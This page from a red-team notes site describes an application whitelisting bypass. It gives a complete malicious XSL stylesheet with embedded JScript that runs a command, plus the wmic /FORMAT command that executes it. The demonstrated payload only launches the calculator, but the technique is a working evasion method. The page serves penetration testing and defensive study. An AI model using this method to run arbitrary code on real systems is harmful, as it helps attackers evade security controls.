Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
regsvr32
MSHTA
Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
CMSTP
InstallUtil
Using MSBuild to Execute Shellcode in C#
Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
pubprn.vbs Signed Script Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Application Whitelisting Bypass with WMIC and XSL
Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo:

Execution

Define the XSL file containing the jscript payload:
evil.xsl
1
<?xml version='1.0'?>
2
<stylesheet
3
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
4
xmlns:user="placeholder"
5
version="1.0">
6
<output method="text"/>
7
<ms:script implements-prefix="user" language="JScript">
8
<![CDATA[
9
var r = new ActiveXObject("WScript.Shell").Run("calc");
10
]]> </ms:script>
11
</stylesheet>
Copied!
Invoke any wmic command now and specify /format pointing to the evil.xsl:
[email protected]
1
wmic os get /FORMAT:"evil.xsl"
Copied!

Observation

Calculator is spawned by svchost.exe:

References

http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
subt0x11.blogspot.com
​
Previous
Forfiles Indirect Command Execution
Next
Powershell Without Powershell.exe
Last modified 3yr ago
Copy link
Contents
Execution
Observation
References